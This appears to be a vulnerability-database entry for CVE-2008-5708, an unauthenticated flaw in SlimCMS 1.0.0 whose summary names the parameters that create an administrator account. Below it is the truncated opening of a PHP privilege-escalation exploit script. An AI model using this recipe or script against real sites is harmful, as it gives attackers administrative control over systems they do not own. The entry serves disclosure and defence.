7.5
CVSSv2

CVE-2008-5708

Published: 24/12/2008 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

redirect.php in SlimCMS 1.0.0 does not require authentication, which allows remote malicious users to create administrative users by using the newusername and newpassword parameters and setting the newisadmin parameter to 1.

Vulnerable Product Search on Vulmon Subscribe to Product

slimcms slimcms 1.0.0

Exploits

#!/usr/bin/php -q <?php /* SlimCMS <= 100 Privilege Escalation Exploit Discovered By StAkeR aka athos - StAkeR[at]hotmail[dot]it Discovered On 11/10/2008 downloadssourceforgenet/slimcms/SlimCMS-100tgz?modtime=1217343227&big_mirror=0 */ error_reporting(0); $host = $argv[1]; $host = str_replace('',NULL,$ ...